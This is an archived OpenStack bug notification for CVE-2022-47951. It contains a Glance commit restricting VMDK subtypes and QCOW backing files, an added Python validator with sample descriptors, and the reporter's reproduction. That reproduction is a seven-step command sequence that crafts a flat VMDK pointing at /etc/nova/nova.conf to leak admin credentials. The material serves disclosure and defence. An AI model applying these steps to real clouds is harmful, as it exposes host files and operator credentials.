yahoo-eng-team team mailing list archive

[Bug 1996188] Re: [OSSA-2023-002] Arbitrary file access through custom VMDK flat descriptor (CVE-2022-47951)

Reviewed:  https://review.opendev.org/c/openstack/glance/+/871613
Committed: https://opendev.org/openstack/glance/commit/0d6282a01691cecc2798f7858b181c4bb30f850c
Submitter: "Zuul (22348)"
Branch:    master

commit 0d6282a01691cecc2798f7858b181c4bb30f850c
Author: Dan Smith <dansmith@xxxxxxxxxx>
Date:   Mon Dec 19 15:00:35 2022 +0000

    Enforce image safety during image_conversion
    
    This does two things:
    
    1. It makes us check that the QCOW backing_file is unset on those
    types of images. Nova and Cinder do this already to prevent an
    arbitrary (and trivial to accomplish) host file exposure exploit.
    2. It makes us restrict VMDK files to only allowed subtypes. These
    files can name arbitrary files on disk as extents, providing the
    same sort of attack. Default that list to just the types we believe
    are actually useful for openstack, and which are monolithic.
    
    The configuration option to specify allowed subtypes is added in
    glance's config and not in the import options so that we can extend
    this check later to image ingest. The format_inspector can tell us
    what the type and subtype are, and we could reject those images early
    and even in the case where image_conversion is not enabled.
    
    Closes-Bug: #1996188
    Change-Id: Idf561f6306cebf756c787d8eefdc452ce44bd5e0


** Changed in: glance
       Status: In Progress => Fix Released
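
As an added example (not code from the glance commit or from the reporter), a minimal Python inspector that applies the two checks the commit describes to constructed inputs: it reads the QCOW header's backing_file_offset and compares a text VMDK descriptor's createType against an allow-list. The allow-list contents, the sample descriptors and the sample headers are assumptions, not glance's configuration or data.

```python
import re
import struct

# Allow-list of VMDK subtypes. The set is an assumption modelled on the fix's
# description (monolithic types only); the real default is glance's config.
ALLOWED_VMDK_SUBTYPES = frozenset({"monolithicSparse", "streamOptimized"})

QCOW_MAGIC = b"QFI\xfb"
_CREATE_TYPE = re.compile(r'^\s*createType\s*=\s*"([^"]+)"', re.M)
# Extent line: access mode, size in sectors, extent type, quoted file name.
_EXTENT = re.compile(r'^\s*(?:RW|RDONLY|NOACCESS)\s+\d+\s+(\w+)\s+"([^"]+)"', re.M)


def qcow_backing_file_set(data: bytes) -> bool:
    """True if a QCOW/QCOW2 header names a backing file.

    Both header versions begin with magic(4) version(4) backing_file_offset(8)
    backing_file_size(4), big-endian; a non-zero offset means one is set.
    """
    if len(data) < 20 or data[:4] != QCOW_MAGIC:
        raise ValueError("not a QCOW image")
    backing_offset, _backing_size = struct.unpack(">QI", data[8:20])
    return backing_offset != 0


def vmdk_extent_files(descriptor: str) -> list:
    """(extent type, file name) pairs the descriptor points at."""
    return _EXTENT.findall(descriptor)


def vmdk_descriptor_check(descriptor: str, allowed=ALLOWED_VMDK_SUBTYPES):
    """Return (accepted, reason) for a textual VMDK descriptor."""
    m = _CREATE_TYPE.search(descriptor)
    if not m:
        return False, "descriptor has no createType"
    subtype = m.group(1)
    if subtype not in allowed:
        return False, "subtype %r not in allowed list" % subtype
    return True, "subtype %r allowed" % subtype


# Constructed samples: a flat descriptor whose extent names a host file, a
# sparse descriptor pointing at a sibling image, and two QCOW2 headers.
FLAT_DESCRIPTOR = ('# Disk DescriptorFile\nversion=1\ncreateType="monolithicFlat"\n'
                   'RW 2048 FLAT "/etc/example.conf" 0\n')
SPARSE_DESCRIPTOR = ('# Disk DescriptorFile\nversion=1\ncreateType="monolithicSparse"\n'
                     'RW 2048 SPARSE "disk.vmdk"\n')
QCOW2_PLAIN = QCOW_MAGIC + struct.pack(">IQI", 3, 0, 0)
QCOW2_BACKED = QCOW_MAGIC + struct.pack(">IQI", 3, 104, 12)
```

The flat descriptor is rejected on subtype alone, before any extent is opened; vmdk_extent_files only shows what such a descriptor would have pointed at.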

https://bugs.launchpad.net/bugs/1996188

Title:
  [OSSA-2023-002] Arbitrary file access through custom VMDK flat
  descriptor (CVE-2022-47951)

Status in Cinder:
  In Progress
Status in Glance:
  Fix Released
Status in OpenStack Compute (nova):
  New
Status in OpenStack Security Advisory:
  Fix Released

Bug description:
  The vulnerability managers received the following report from
  Sébastien Meriot with OVH via encrypted E-mail:

  Our Openstack team did discover what looks like a security issue in Nova this morning allowing a remote attacker to read any file on the system.
  After making a quick CVSS calculation, we got a CVSS of 5.8 (CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N).

  Here are the details:
  By using a VMDK file, you can dump any file on the hypervisor.
  1. Create an image: qemu-img create -f vmdk leak.vmdk 1M -o subformat=monolithicFlat
  2. Edit the leak.vmdk and change the name this way: RW 2048 FLAT "leak-flat.vmdk" 0 --> RW 2048 FLAT "/etc/nova/nova.conf" 0
  3. Upload the image: openstack image create --file leak.vmdk leak.vmdk
  4. Start a new instance: openstack server create --image leak.vmdk --net demo --flavor nano leak-instance
  5. The instance won't boot of course. You can create an image from this instance: openstack server image create --name leak-instance-image leak-instance
  6. Download the image: openstack image save --file leak-instance-image leak-instance-image
  7. You get access to the nova.conf file content and you can get access to the openstack admin creds.

  We are working on a fix and would be happy to share it with you if needed.
  We think it does affect Nova but it could affect Glance as well. We're not sure yet.

  [postscript per Arnaud Morin (amorin) in IRC]

  Cinder also seems to be affected
